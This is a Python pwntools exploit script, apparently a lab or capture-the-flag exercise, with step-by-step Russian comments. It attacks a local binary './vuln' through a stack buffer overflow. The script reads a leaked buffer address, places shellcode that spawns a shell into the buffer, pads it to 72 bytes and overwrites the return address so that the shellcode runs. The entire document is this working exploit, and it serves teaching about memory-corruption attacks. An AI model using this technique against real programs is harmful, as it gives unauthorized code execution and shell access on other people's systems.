from pwn import *
#Импортируем библиотеку pwntools

elf = context.binary = ELF("./vuln")
# Загружаем бинарный файл "vuln"(Считываем структуру данного ELF файла с диска 
# во внутренние структуры данных(словари, объекты в памяти Python).

io = elf.process()
# Запускается локальный процесс и перенаправляем потоки ввода-вывода в 'pipes'.
# Теперь мы можем манипулировать вводом и выводом процесса, читая его вывод в наш скрипт
# и записывая ввод непосредственно в дочерний процесс(./vuln).

leak = int(io.recvline().strip(), 16)
# Считываем вывод функции 'printf()' из дочернего процесса, выводящую адрес буфера,
# затем убираем лишние символы(конец строки) и переводим это число в десятичное представление.
# Второй аргумент функции 'int()', 16, говорит что мы переводим из 16-ричной системы счисления.
# Записываем полученное число в переменную "leak".

log.success(f"buf @ {hex(leak)}")
# Выводим адрес буфера

shellcode = asm("sub rsp, 0x100") + asm(shellcraft.sh())
# Переносим регистр "RSP" на 256 байт(0x100) ниже.
# Когда программа завершает работу уязвимой функции и срабатывает инструкция 'ret' (переход на наш адрес возврата), 
# процессор переносит управление прямо на адрес нашего шеллкода, лежащего в буфере. В этот момент RSP указывает ровно на начало нашего шеллкода.
# Если шеллкод начнет работать (например, делать push каких-то строк на стек), он будет записывать данные поверх самого себя, 
# потому что под ним нет "пустого" пространства - там сразу идут другие данные или конец стека.
# Именно поэтому в самом начале шеллкода пишут sub rsp, 0x100. 
# Это искусственно «опускает» верхушку стека (RSP) еще ниже (на 256 байт вглубь), освобождая безопасную зону ("воздух"), 
# где шеллкод может свободно использовать стек, не повреждая самого себя.
# 'shellcraft.sh()' формирует shell-код и переводит в машинный код.

padding = 72 - len(shellcode)
# Считаем паддинг. Поскольку буфер вмещает 64 байта, мы складываем его длину с 8, что равняется 8 байтам регистра RBP, за которым
# следует адрес возврата. Теперь отнимает от общей длины длину нашего shell-кода, чтобы знать, сколько "мусорных" байт нам записать в буфер.

payload = shellcode + (b'A' * padding) + pack(leak)
# В переменную "payload" записываем наши данные, которые мы поместим в буфер( shell-код, "мусорные" байты, адрес буфера(откуда начнется выполнение shell-кода) )

io.sendline(payload)
# Записываем в поток ввода наш "payload".

io.interactive()
# Передаем управление терминалу.

